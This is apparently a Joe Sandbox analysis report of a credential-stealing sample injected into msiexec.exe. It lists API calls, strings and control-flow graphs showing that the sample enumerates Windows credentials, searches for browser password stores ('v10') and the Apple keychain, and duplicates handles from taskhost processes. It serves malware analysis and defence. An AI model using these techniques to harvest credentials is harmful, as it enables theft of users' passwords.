40242->40194 40243->40167 40244->40167 40245->40167 40246->40167 40247->40167 40248->40185 40249->40168 40250->40172 40251->40175 40252->40181 40253->40193 40259 415cfe 40254->40259 40263 415d23 __aullrem __aulldvrm 40259->40263 40266 41628e 40259->40266 40260 4163ca 40273 416422 11 API calls 40260->40273 40262 416172 memset 40262->40263 40263->40260 40263->40262 40264 416422 10 API calls 40263->40264 40265 415cb9 10 API calls 40263->40265 40263->40266 40264->40263 40265->40263 40267 416520 40266->40267 40268 416527 40267->40268 40272 416574 40267->40272 40270 416544 40268->40270 40268->40272 40274 4156aa 11 API calls 40268->40274 40271 416561 memcpy 40270->40271 40270->40272 40271->40272 40272->40066 40273->40266 40274->40270 40296 41493c EnumResourceNamesW 37679 4287c1 37680 4287d2 37679->37680 37681 429ac1 37679->37681 37682 428818 37680->37682 37683 42881f 37680->37683 37703 425711 37680->37703 37693 425ad6 37681->37693 37749 415c56 11 API calls 37681->37749 37716 42013a 37682->37716 37744 420244 96 API calls 37683->37744 37687 4260dd 37743 424251 119 API calls 37687->37743 37689 4259da 37742 416760 11 API calls 37689->37742 37694 429a4d 37699 429a66 37694->37699 37700 429a9b 37694->37700 37697 422aeb memset memcpy memcpy 37697->37703 37745 415c56 11 API calls 37699->37745 37702 429a96 37700->37702 37747 416760 11 API calls 37700->37747 37748 424251 119 API calls 37702->37748 37703->37681 37703->37689 37703->37694 37703->37697 37704 4260a1 37703->37704 37712 4259c2 37703->37712 37715 425a38 37703->37715 37732 4227f0 memset memcpy 37703->37732 37733 422b84 15 API calls 37703->37733 37734 422b5d memset memcpy memcpy 37703->37734 37735 422640 13 API calls 37703->37735 37737 4241fc 11 API calls 37703->37737 37738 42413a 89 API calls 37703->37738 37741 415c56 11 API calls 37704->37741 37705 429a7a 37746 416760 11 API calls 37705->37746 37712->37693 37736 415c56 11 API calls 37712->37736 37715->37712 37739 422640 13 API calls 37715->37739 37740 4226e0 12 API calls 37715->37740 37717 42014c 37716->37717 37720 420151 37716->37720 37759 41e466 96 API calls 37717->37759 37719 420162 37719->37703 37720->37719 37721 4201b3 37720->37721 37722 420229 37720->37722 37723 4201b8 37721->37723 37724 4201dc 37721->37724 37722->37719 37725 41fd5e 85 API calls 37722->37725 37750 41fbdb 37723->37750 37724->37719 37729 4201ff 37724->37729 37756 41fc4c 37724->37756 37725->37719 37729->37719 37731 42013a 96 API calls 37729->37731 37731->37719 37732->37703 37733->37703 37734->37703 37735->37703 37736->37689 37737->37703 37738->37703 37739->37715 37740->37715 37741->37689 37742->37687 37743->37693 37744->37703 37745->37705 37746->37702 37747->37702 37748->37681 37749->37689 37751 41fbf8 37750->37751 37754 41fbf1 37750->37754 37764 41ee26 37751->37764 37755 41fc39 37754->37755 37774 4446ce 11 API calls 37754->37774 37755->37719 37760 41fd5e 37755->37760 37757 41ee6b 85 API calls 37756->37757 37758 41fc5d 37757->37758 37758->37724 37759->37720 37762 41fd65 37760->37762 37761 41fdab 37761->37719 37762->37761 37763 41fbdb 85 API calls 37762->37763 37763->37762 37765 41ee41 37764->37765 37766 41ee32 37764->37766 37775 41edad 37765->37775 37778 4446ce 11 API calls 37766->37778 37769 41ee3c 37769->37754 37772 41ee58 37772->37769 37780 41ee6b 37772->37780 37774->37755 37784 41be52 37775->37784 37778->37769 37779 41eb85 11 API calls 37779->37772 37781 41ee70 37780->37781 37782 41ee78 37780->37782 37837 41bf99 85 API calls 37781->37837 37782->37769 37785 41be6f 37784->37785 37786 41be5f 37784->37786 37792 41be8c 37785->37792 37816 418c63 memset memset 37785->37816 37815 4446ce 11 API calls 37786->37815 37788 41be69 37788->37769 37788->37779 37790 41bee7 37790->37788 37820 41a453 85 API calls 37790->37820 37792->37788 37792->37790 37793 41bf3a 37792->37793 37794 41bed1 37792->37794 37819 4446ce 11 API calls 37793->37819 37796 41bef0 37794->37796 37799 41bee2 37794->37799 37796->37790 37797 41bf01 37796->37797 37798 41bf24 memset 37797->37798 37800 41bf14 37797->37800 37817 418a6d memset memcpy memset 37797->37817 37798->37788 37805 41ac13 37799->37805 37818 41a223 memset memcpy memset 37800->37818 37804 41bf20 37804->37798 37806 41ac52 37805->37806 37807 41ac3f memset 37805->37807 37810 41ac6a 37806->37810 37821 41dc14 19 API calls 37806->37821 37808 41acd9 37807->37808 37808->37790 37812 41aca1 37810->37812 37822 41519d 37810->37822 37812->37808 37813 41acc0 memset 37812->37813 37814 41accd memcpy 37812->37814 37813->37808 37814->37808 37815->37788 37816->37792 37817->37800 37818->37804 37819->37790 37821->37810 37825 4175ed 37822->37825 37833 417570 SetFilePointer 37825->37833 37828 41760a ReadFile 37830 417637 37828->37830 37831 417627 GetLastError 37828->37831 37829 4151b3 37829->37812 37830->37829 37832 41763e memset 37830->37832 37831->37829 37832->37829 37834 4175b2 37833->37834 37835 41759c GetLastError 37833->37835 37834->37828 37834->37829 37835->37834 37836 4175a8 GetLastError 37835->37836 37836->37834 37837->37782 37838 417bc5 37840 417c61 37838->37840 37844 417bda 37838->37844 37839 417bf6 UnmapViewOfFile CloseHandle 37839->37839 37839->37844 37842 417c2c 37842->37844 37850 41851e 18 API calls 37842->37850 37844->37839 37844->37840 37844->37842 37845 4175b7 37844->37845 37846 4175d6 CloseHandle 37845->37846 37847 4175c8 37846->37847 37848 4175df 37846->37848 37847->37848 37849 4175ce Sleep 37847->37849 37848->37844 37849->37846 37850->37842 39755 4147f3 39758 414561 39755->39758 39757 414813 39759 41456d 39758->39759 39760 41457f GetPrivateProfileIntW 39758->39760 39763 4143f1 memset _itow WritePrivateProfileStringW 39759->39763 39760->39757 39762 41457a 39762->39757 39763->39762

                                                                            Executed Functions

                                                                            Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 357 40de74-40de78 356->357 358 40de65-40de6c 356->358 357->352 357->356 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 372 40dff8-40dffb 370->372 373 40defd-40df02 370->373 371->370 374 40ded0-40dee1 _wcsicmp 371->374 372->363 377 40dffd-40e006 372->377 375 40df08 373->375 376 40dfef-40dff2 CloseHandle 373->376 374->370 374->377 378 40df0b-40df10 375->378 376->372 377->362 377->363 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->376 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->376
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040DDAD
                                                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                            • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                              • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                            • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                            • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                            • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                            • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                            • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                            • _wcsicmp.MSVCRT ref: 0040DED8
                                                                            • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                            • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                            • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                            • memset.MSVCRT ref: 0040DF5F
                                                                            • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                            • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                            • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                            • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                            • API String ID: 708747863-3398334509
                                                                            • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                            • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                            • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                            • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                            Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 578 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 581 413f00-413f11 Process32NextW 578->581 582 413da5-413ded OpenProcess 581->582 583 413f17-413f24 CloseHandle 581->583 584 413eb0-413eb5 582->584 585 413df3-413e26 memset call 413f27 582->585 584->581 586 413eb7-413ebd 584->586 593 413e79-413e9d call 413959 call 413ca4 585->593 594 413e28-413e35 585->594 588 413ec8-413eda call 4099f4 586->588 589 413ebf-413ec6 free 586->589 591 413edb-413ee2 588->591 589->591 597 413ee4 591->597 598 413ee7-413efe 591->598 605 413ea2-413eae CloseHandle 593->605 595 413e61-413e68 594->595 596 413e37-413e44 GetModuleHandleW 594->596 595->593 602 413e6a-413e76 595->602 596->595 601 413e46-413e5c GetProcAddress 596->601 597->598 598->581 601->595 602->593 605->584
                                                                            APIs
                                                                              • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                            • memset.MSVCRT ref: 00413D7F
                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                            • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                            • memset.MSVCRT ref: 00413E07
                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                            • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                            • free.MSVCRT ref: 00413EC1
                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                            • CloseHandle.KERNELBASE(00000000,00000000,0000022C), ref: 00413F1A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                            • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                            • API String ID: 1344430650-1740548384
                                                                            • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                            • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                            • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                            • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                            Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                            • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                            • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                            • String ID:
                                                                            • API String ID: 3473537107-0
                                                                            • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                            • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                            • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                            • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                            Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                            • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$FirstNext
                                                                            • String ID:
                                                                            • API String ID: 1690352074-0
                                                                            • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                            • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                            • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                            • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                            Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0041898C
                                                                            • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: InfoSystemmemset
                                                                            • String ID:
                                                                            • API String ID: 3558857096-0
                                                                            • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                            • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                            • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                            • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                            Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 42 44558e-445594 call 444b06 4->42 43 44557e-44558c call 4136c0 call 41366b 4->43 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 45 445823-445826 14->45 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 53 445879-44587c 18->53 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 87 445685 21->87 88 4456b2-4456b5 call 40b1ab 21->88 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 139 44592d-445945 call 40b6ef 24->139 140 44594a 24->140 37 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->37 38 445b29-445b32 28->38 157 4459d0-4459e8 call 40b6ef 29->157 158 4459ed 29->158 30->21 41 445609-44560d 30->41 31->30 182 445b08-445b15 call 40ae51 37->182 54 445c7c-445c85 38->54 55 445b38-445b96 memset * 3 38->55 41->21 51 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->51 42->3 43->42 56 44584c-445854 call 40b1ab 45->56 57 445828 45->57 154 445665-445670 call 40b1ab 51->154 155 445643-445663 call 40a9b5 call 4087b3 51->155 67 4458a2-4458aa call 40b1ab 53->67 68 44587e 53->68 63 445d1c-445d25 54->63 64 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 54->64 69 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 55->69 70 445b98-445ba0 55->70 56->13 71 44582e-445847 call 40a9b5 call 4087b3 57->71 76 445fae-445fb2 63->76 77 445d2b-445d3b 63->77 159 445cf5 64->159 160 445cfc-445d03 64->160 67->19 85 445884-44589d call 40a9b5 call 4087b3 68->85 249 445c77 69->249 70->69 86 445ba2-445bcf call 4099c6 call 445403 call 445389 70->86 142 445849 71->142 94 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 77->94 95 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 77->95 146 44589f 85->146 86->54 89 44568b-4456a4 call 40a9b5 call 4087b3 87->89 107 4456ba-4456c4 88->107 148 4456a9-4456b0 89->148 165 445d67-445d6c 94->165 166 445d71-445d83 call 445093 94->166 196 445e17 95->196 197 445e1e-445e25 95->197 121 4457f9 107->121 122 4456ca-4456d3 call 413cfa call 413d4c 107->122 121->6 174 4456d8-4456f7 call 40b2cc call 413fa6 122->174 139->140 140->23 142->56 146->67 148->88 148->89 154->107 155->154 157->158 158->28 159->160 171 445d05-445d13 160->171 172 445d17 160->172 176 445fa1-445fa9 call 40b6ef 165->176 166->76 171->172 172->63 206 4456fd-445796 memset * 4 call 409c70 * 3 174->206 207 4457ea-4457f7 call 413d29 174->207 176->76 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->38 201->182 221 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->221 239 445e62-445e69 202->239 240 445e5b 202->240 220 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->220 206->207 248 445798-4457ca call 40b2cc call 409d1f call 409b98 206->248 207->10 220->76 253 445f9b 220->253 221->182 239->203 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 264 445f4d-445f5a call 40ae51 245->264 248->207 265 4457cc-4457e5 call 4087b3 248->265 249->54 253->176 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->220 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                            APIs
                                                                            • memset.MSVCRT ref: 004455C2
                                                                            • wcsrchr.MSVCRT ref: 004455DA
                                                                            • memset.MSVCRT ref: 0044570D
                                                                            • memset.MSVCRT ref: 00445725
                                                                              • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                              • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                              • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                              • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                              • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                              • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                              • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                              • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                            • memset.MSVCRT ref: 0044573D
                                                                            • memset.MSVCRT ref: 00445755
                                                                            • memset.MSVCRT ref: 004458CB
                                                                            • memset.MSVCRT ref: 004458E3
                                                                            • memset.MSVCRT ref: 0044596E
                                                                            • memset.MSVCRT ref: 00445A10
                                                                            • memset.MSVCRT ref: 00445A28
                                                                            • memset.MSVCRT ref: 00445AC6
                                                                              • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                              • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                              • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                              • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                              • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                            • memset.MSVCRT ref: 00445B52
                                                                            • memset.MSVCRT ref: 00445B6A
                                                                            • memset.MSVCRT ref: 00445C9B
                                                                            • memset.MSVCRT ref: 00445CB3
                                                                            • _wcsicmp.MSVCRT ref: 00445D56
                                                                            • memset.MSVCRT ref: 00445B82
                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                              • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                              • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                              • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                              • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                            • memset.MSVCRT ref: 00445986
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                            • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                            • API String ID: 2263259095-3798722523
                                                                            • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                            • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                            • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                            • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                            Function 0041276D Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                              • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                              • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                              • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                            • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                            • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                            • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                            • String ID: $/deleteregkey$/savelangfile
                                                                            • API String ID: 2744995895-28296030
                                                                            • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                            • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                            • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                            • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                            Function 0040B6EF Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 388fileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040B71C
                                                                              • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                              • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                            • wcsrchr.MSVCRT ref: 0040B738
                                                                            • memset.MSVCRT ref: 0040B756
                                                                            • memset.MSVCRT ref: 0040B7F5
                                                                            • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                            • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                            • memset.MSVCRT ref: 0040B851
                                                                            • memset.MSVCRT ref: 0040B8CA
                                                                            • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
